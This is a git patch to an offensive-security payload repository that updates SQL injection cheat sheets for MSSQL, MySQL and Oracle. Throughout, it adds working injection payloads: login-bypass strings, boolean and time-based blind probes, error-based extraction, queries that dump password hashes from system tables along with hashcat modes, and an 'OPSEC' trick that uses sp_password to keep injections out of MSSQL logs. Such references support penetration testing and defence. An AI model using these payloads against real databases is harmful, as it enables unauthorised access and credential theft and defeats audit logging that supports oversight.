From 6861c46fcdb7f75c84725c82608730336f59a1fb Mon Sep 17 00:00:00 2001
From: Swissky <12152583+swisskyrepo@users.noreply.github.com>
Date: Fri, 14 Apr 2023 17:45:45 +0200
Subject: [PATCH] MySQL MSSQL Oracle SQL Update
---
 SQL Injection/MSSQL Injection.md | 76 +++++++++++++++++------
 SQL Injection/MySQL Injection.md | 91 ++++++++++++++++++++++------
 SQL Injection/OracleSQL Injection.md | 57 +++++++++++++++--
 SQL Injection/README.md | 15 +++-
 4 files changed, 188 insertions(+), 51 deletions(-)
diff --git a/SQL Injection/MSSQL Injection.md b/SQL Injection/MSSQL Injection.md
index ce645d4..80b2f9d 100644
--- a/SQL Injection/MSSQL Injection.md
+++ b/SQL Injection/MSSQL Injection.md
@@ -2,15 +2,16 @@
 ## Summary
+* [MSSQL Default Databases](#mssql-default-databases)
 * [MSSQL Comments](#mssql-comments)
 * [MSSQL User](#mssql-user)
 * [MSSQL Version](#mssql-version)
 * [MSSQL Hostname](#mssql-hostname)
-* [MSSQL Database name](#mssql-database-name)
+* [MSSQL Database Name](#mssql-database-name)
+* [MSSQL Database Credentials](#mssql-database-credentials)
 * [MSSQL List databases](#mssql-list-databases)
 * [MSSQL List columns](#mssql-list-columns)
 * [MSSQL List tables](#mssql-list-tables)
-* [MSSQL Extract user/password](#mssql-extract-userpassword)
 * [MSSQL Union Based](#mssql-union-based)
 * [MSSQL Error Based](#mssql-error-based)
 * [MSSQL Blind Based](#mssql-blind-based)
@@ -25,12 +26,27 @@
 * [MSSQL Trusted Links](#mssql-trusted-links)
 * [MSSQL List permissions](#mssql-list-permissions)
+
+## MSSQL Default Databases
+
+| Name | Description |
+|-----------------------|---------------------------------------|
+| pubs | Not available on MSSQL 2005 |
+| model | Available in all versions |
+| msdb | Available in all versions |
+| tempdb | Available in all versions |
+| northwind | Available in all versions |
+| information_schema | Availalble from MSSQL 2000 and higher |
+
+
 ## MSSQL Comments
-```sql
--- comment goes here
-/* comment goes here */
-```
+| Type | Description |
+|----------------------------|-----------------------------------|
+| `/* MSSQL Comment */` | C-style comment |
+| `-- -` | SQL comment |
+| `;%00` | Null byte |
+
 ## MSSQL User
@@ -41,7 +57,7 @@ SELECT system_user;
 SELECT user;
 ```
-## MSSQL version
+## MSSQL Version
 ```sql
 SELECT @@version
@@ -51,7 +67,11 @@ SELECT @@version
 ```sql
 SELECT HOST_NAME()
-SELECT @@hostname;
+SELECT @@hostname
+SELECT @@SERVERNAME
+SELECT SERVERPROPERTY('productversion')
+SELECT SERVERPROPERTY('productlevel')
+SELECT SERVERPROPERTY('edition');
 ```
 ## MSSQL Database name
@@ -60,6 +80,22 @@ SELECT @@hostname;
 SELECT DB_NAME()
 ```
+
+## MSSQL Database Credentials
+
+* **MSSQL 2000**: Hashcat mode 131: `0x01002702560500000000000000000000000000000000000000008db43dd9b1972a636ad0c7d4b8c515cb8ce46578`
+ ```sql
+ SELECT name, password FROM master..sysxlogins
+ SELECT name, master.dbo.fn_varbintohexstr(password) FROM master..sysxlogins
+ -- Need to convert to hex to return hashes in MSSQL error message / some version of query analyzer
+ ```
+* **MSSQL 2005**: Hashcat mode 132: `0x010018102152f8f28c8499d8ef263c53f8be369d799f931b2fbe`
+ ```sql
+ SELECT name, password_hash FROM master.sys.sql_logins
+ SELECT name + '-' + master.sys.fn_varbintohexstr(password_hash) from master.sys.sql_logins
+ ```
+
+
 ## MSSQL List databases
 ```sql
@@ -88,17 +124,6 @@ SELECT table_catalog, table_name FROM information_schema.columns
 SELECT STRING_AGG(name, ', ') FROM master..sysobjects WHERE xtype = 'U'; -- Change delimeter value such as ', ' to anything else you want => trace_xe_action_map, trace_xe_event_map, spt_fallback_db, spt_fallback_dev, spt_fallback_usg, spt_monitor, MSreplication_options (Only works in MSSQL 2017+)
 ```
-## MSSQL Extract user/password
-
-```sql
-MSSQL 2000:
-SELECT name, password FROM master..sysxlogins
-SELECT name, master.dbo.fn_varbintohexstr(password) FROM master..sysxlogins (Need to convert to hex to return hashes in MSSQL error message / some version of query analyzer.)
-
-MSSQL 2005
-SELECT name, password_hash FROM master.sys.sql_logins
-SELECT name + '-' + master.sys.fn_varbintohexstr(password_hash) from master.sys.sql_logins
-```
 ## MSSQL Union Based
@@ -141,6 +166,7 @@ AND LEN(SELECT TOP 1 username FROM tblusers)=5 ; -- -
 AND ASCII(SUBSTRING(SELECT TOP 1 username FROM tblusers),1,1)=97
 AND UNICODE(SUBSTRING((SELECT 'A'),1,1))>64--
+AND SELECT SUBSTRING(table_name,1,1) FROM information_schema.tables > 'A'
 AND ISNULL(ASCII(SUBSTRING(CAST((SELECT LOWER(db_name(0)))AS varchar(8000)),1,1)),0)>90
@@ -159,7 +185,8 @@ ProductID=1';waitfor delay '0:0:10'--
 ProductID=1');waitfor delay '0:0:10'--
 ProductID=1));waitfor delay '0:0:10'--
-IF([INFERENCE]) WAITFOR DELAY '0:0:[SLEEPTIME]' comment: --
+IF([INFERENCE]) WAITFOR DELAY '0:0:[SLEEPTIME]'
+IF 1=1 WAITFOR DELAY '0:0:5' ELSE WAITFOR DELAY '0:0:0';
 ```
 ## MSSQL Stacked Query
@@ -325,6 +352,15 @@ Check if current user is a member of the specified server role.
 SELECT is_srvrolemember('sysadmin');
 ```
+## MSSQL OPSEC
+
+Use `SP_PASSWORD` in a query to hide from the logs like : `' AND 1=1--sp_password`
+
+```sql
+-- 'sp_password' was found in the text of this event.
+-- The text has been replaced with this comment for security reasons.
+```
+
 ## References
 * [Pentest Monkey - mssql-sql-injection-cheat-sheet](http://pentestmonkey.net/cheat-sheet/sql-injection/mssql-sql-injection-cheat-sheet)
diff --git a/SQL Injection/MySQL Injection.md b/SQL Injection/MySQL Injection.md
index 393ab40..683b8b6 100644
--- a/SQL Injection/MySQL Injection.md
+++ b/SQL Injection/MySQL Injection.md
@@ -2,7 +2,8 @@
 ## Summary
-* [MYSQL Comment](#mysql-comment)
+* [MYSQL Default Databases](#mysql-default-databases)
+* [MYSQL Comments](#mysql-comments)
 * [MYSQL Union Based](#mysql-union-based)
 * [Detect columns number](#detect-columns-number)
 * [Extract database with information_schema](#extract-database-with-information_schema)
@@ -35,15 +36,61 @@
 * [References](#references)
-## MYSQL comment
+## MYSQL Default Databases
-```sql
-# MYSQL Comment
--- comment [Note the space after the double dash]
-/* MYSQL Comment */
-/*! MYSQL Special SQL */
-/*!32302 10*/ Comment for MYSQL version 3.23.02
-```
+| Name | Description |
+|--------------------|--------------------------|
+| mysql | Requires root privileges |
+| information_schema | Availalble from version 5 and higher |
+
+
+## MYSQL comments
+
+| Type | Description |
+|----------------------------|-----------------------------------|
+| `#` | Hash comment |
+| `/* MYSQL Comment */` | C-style comment |
+| `/*! MYSQL Special SQL */` | Special SQL |
+| `/*!32302 10*/` | Comment for MYSQL version 3.23.02 |
+| `-- -` | SQL comment |
+| `;%00` | Nullbyte |
+| \` | Backtick |
+
+
+## MYSQL Testing Injection
+
+* **Strings**: Query like `SELECT * FROM Table WHERE id = 'FUZZ';`
+ ```
+ ' False
+ '' True
+ " False
+ "" True
+ \ False
+ \\ True
+ ```
+
+* **Numeric**: Query like `SELECT * FROM Table WHERE id = FUZZ;`
+ ```ps1
+ AND 1 True
+ AND 0 False
+ AND true True
+ AND false False
+ 1-false Returns 1 if vulnerable
+ 1-true Returns 0 if vulnerable
+ 1*56 Returns 56 if vulnerable
+ 1*56 Returns 1 if not vulnerable
+ ```
+
+* **Login**: Query like `SELECT * FROM Users WHERE username = 'FUZZ1' AND password = 'FUZZ2';`
+ ```ps1
+ ' OR '1
+ ' OR 1 -- -
+ " OR "" = "
+ " OR 1 = 1 -- -
+ '='
+ 'LIKE'
+ '=0--+
+ ```
 ## MYSQL Union Based
@@ -177,9 +224,6 @@ MariaDB [dummydb]> select author_id,title from posts where author_id=-1 union se
 ```
-
-
-
 ## MYSQL Error Based
 ### MYSQL Error Based - Basic
@@ -191,6 +235,7 @@ Works with `MySQL >= 4.1`
 '+(select 1 and row(1,1)>(select count(*),concat(CONCAT(@@VERSION),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'
 ```
+
 ### MYSQL Error Based - UpdateXML function
 ```sql
@@ -208,6 +253,7 @@ Shorter to read:
 ' and updatexml(null,concat(0x0a,(select table_name from information_schema.tables where table_schema=database() LIMIT 0,1)),null)-- -
 ```
+
 ### MYSQL Error Based - Extractvalue function
 Works with `MySQL >= 5.1`
@@ -220,6 +266,7 @@ Works with `MySQL >= 5.1`
 ?id=1 AND extractvalue(rand(),concat(0x3a,(SELECT concat(CHAR(126),data_info,CHAR(126)) FROM data_table.data_column LIMIT data_offset,1)))--
 ```
+
 ### MYSQL Error Based - NAME_CONST function (only for constants)
 Works with `MySQL >= 5.0`
@@ -230,6 +277,7 @@ Works with `MySQL >= 5.0`
 ?id=1 AND (SELECT * FROM (SELECT NAME_CONST(database(),1),NAME_CONST(database(),1)) as x)--
 ```
+
 ## MYSQL Blind
 ### MYSQL Blind with substring equivalent
@@ -306,13 +354,17 @@ SELECT cust_code FROM customer WHERE cust_name LIKE 'k__l';
 The following SQL codes will delay the output from MySQL.
-```sql
-+BENCHMARK(40000000,SHA1(1337))+
-'%2Bbenchmark(3200,SHA1(1))%2B'
-AND [RANDNUM]=BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]')) //SHA1
-RLIKE SLEEP([SLEEPTIME])
-OR ELT([RANDNUM]=[RANDNUM],SLEEP([SLEEPTIME]))
-```
+* MySQL 4/5 : `BENCHMARK()`
+ ```sql
+ +BENCHMARK(40000000,SHA1(1337))+
+ '%2Bbenchmark(3200,SHA1(1))%2B'
+ AND [RANDNUM]=BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]')) //SHA1
+ ```
+* MySQL 5: `SLEEP()`
+ ```sql
+ RLIKE SLEEP([SLEEPTIME])
+ OR ELT([RANDNUM]=[RANDNUM],SLEEP([SLEEPTIME]))
+ ```
 ### Using SLEEP in a subselect
@@ -342,6 +394,7 @@ OR ELT([RANDNUM]=[RANDNUM],SLEEP([SLEEPTIME]))
 ?id=1 OR IF(MID(@@version,1,1)='5',sleep(1),1)='2
 ```
+
 ## MYSQL DIOS - Dump in One Shot
 ```sql
diff --git a/SQL Injection/OracleSQL Injection.md b/SQL Injection/OracleSQL Injection.md
index 36d0514..6aa649d 100644
--- a/SQL Injection/OracleSQL Injection.md
+++ b/SQL Injection/OracleSQL Injection.md
@@ -2,8 +2,12 @@
 ## Summary
-* [Oracle SQL version](#oracle-sql-version)
-* [Oracle SQL database name](#oracle-sql-database-name)
+* [Oracle SQL Default Databases](#oracle-sql-default-databases)
+* [Oracle SQL Comments](#oracle-sql-comments)
+* [Oracle SQL Version](#oracle-sql-version)
+* [Oracle SQL Hostname](#oracle-sql-hostname)
+* [Oracle SQL Database Name](#oracle-sql-database-name)
+* [Oracle SQL Database Credentials](#oracle-sql-database-credentials)
 * [Oracle SQL List databases](#oracle-sql-list-databases)
 * [Oracle SQL List columns](#oracle-sql-list-columns)
 * [Oracle SQL List tables](#oracle-sql-list-tables)
@@ -13,13 +17,42 @@
 * [Oracle SQL Command execution](#oracle-sql-command-execution)
 * [References](#references)
-## Oracle SQL version
+
+## Oracle SQL Default Databases
+
+| Name | Description |
+|--------------------|---------------------------|
+| SYSTEM | Available in all versions |
+| SYSAUX | Available in all versions |
+
+
+## Oracle SQL Comments
+
+| Type | Description |
+|----------------------------|-----------------------------------|
+| `-- -` | SQL comment |
+
+
+## Oracle SQL Version
 ```sql
 SELECT user FROM dual UNION SELECT * FROM v$version
+SELECT banner FROM v$version WHERE banner LIKE 'Oracle%';
+SELECT banner FROM v$version WHERE banner LIKE 'TNS%';
+SELECT version FROM v$instance;
 ```
-## Oracle SQL database name
+## Oracle SQL Hostname
+
+```sql
+SELECT host_name FROM v$instance; (Privileged)
+SELECT UTL_INADDR.get_host_name FROM dual;
+SELECT UTL_INADDR.get_host_name('10.0.0.1') FROM dual;
+SELECT UTL_INADDR.get_host_address FROM dual;
+```
+
+
+## Oracle SQL Database Name
 ```sql
 SELECT global_name FROM global_name;
@@ -28,6 +61,15 @@ SELECT instance_name FROM V$INSTANCE;
 SELECT SYS.DATABASE_NAME FROM DUAL;
 ```
+## Oracle SQL Database Credentials
+
+| Query | Description |
+|-----------------------------------------|---------------------------|
+| `SELECT username FROM all_users;` | Available on all versions |
+| `SELECT name, password from sys.user$;` | Privileged, <= 10g |
+| `SELECT name, spare4 from sys.user$;` | Privileged, <= 11g |
+
+
 ## Oracle SQL List Databases
 ```sql
@@ -71,12 +113,14 @@ SELECT owner, table_name FROM all_tab_columns WHERE column_name LIKE '%PASS%';
 | Column message exists in table log_table | SELECT COUNT(*) FROM user_tab_cols WHERE column_name = 'MESSAGE' AND table_name = 'LOG_TABLE'; |
 | First letter of first message is t | SELECT message FROM log_table WHERE rownum=1 AND message LIKE 't%'; |
+
 ## Oracle SQL Time based
 ```sql
-AND [RANDNUM]=DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) comment: -- /**/
+AND [RANDNUM]=DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME])
 ```
+
 ## Oracle SQL Command Execution
 * [ODAT (Oracle Database Attacking Tool)](https://github.com/quentinhardy/odat)
@@ -140,4 +184,5 @@ SELECT PwnUtilFunc('ping -c 4 localhost') FROM dual;
 * [NetSpi - SQL Wiki](https://sqlwiki.netspi.com/injectionTypes/errorBased/#oracle)
 * [ASDC12 - New and Improved Hacking Oracle From Web](https://owasp.org/www-pdf-archive/ASDC12-New_and_Improved_Hacking_Oracle_From_Web.pdf)
 * [Pentesting Oracle TNS Listener - HackTricks](https://book.hacktricks.xyz/network-services-pentesting/1521-1522-1529-pentesting-oracle-listener)
-* [ODAT: Oracle Database Attacking Tool](https://github.com/quentinhardy/odat/wiki/privesc)
\ No newline at end of file
+* [ODAT: Oracle Database Attacking Tool](https://github.com/quentinhardy/odat/wiki/privesc)
+* [WebSec CheatSheet - Oracle](https://www.websec.ca/kb/sql_injection#Oracle_Default_Databases)
\ No newline at end of file
diff --git a/SQL Injection/README.md b/SQL Injection/README.md
index 0ed8607..13be815 100644
--- a/SQL Injection/README.md
+++ b/SQL Injection/README.md
@@ -10,12 +10,15 @@ Attempting to manipulate SQL queries may have goals including:
 ## Summary
-* [CheatSheet MSSQL Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/MSSQL%20Injection.md)
-* [CheatSheet MySQL Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/MySQL%20Injection.md)
-* [CheatSheet OracleSQL Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/OracleSQL%20Injection.md)
-* [CheatSheet PostgreSQL Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/PostgreSQL%20Injection.md)
-* [CheatSheet SQLite Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/SQLite%20Injection.md)
-* [CheatSheet Cassandra Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/Cassandra%20Injection.md)
+* [CheatSheets](#cheatsheets)
+ * [MSSQL Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/MSSQL%20Injection.md)
+ * [MySQL Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/MySQL%20Injection.md)
+ * [OracleSQL Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/OracleSQL%20Injection.md)
+ * [PostgreSQL Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/PostgreSQL%20Injection.md)
+ * [SQLite Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/SQLite%20Injection.md)
+ * [Cassandra Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/Cassandra%20Injection.md)
+ * [HQL Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/HQL%20Injection.md)
+ * [DB2 Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/DB2%20Injection.md)
 * [Entry point
detection](#entry-point-detection)
 * [DBMS Identification](#dbms-identification)
 * [SQL injection using SQLmap](#sql-injection-using-sqlmap)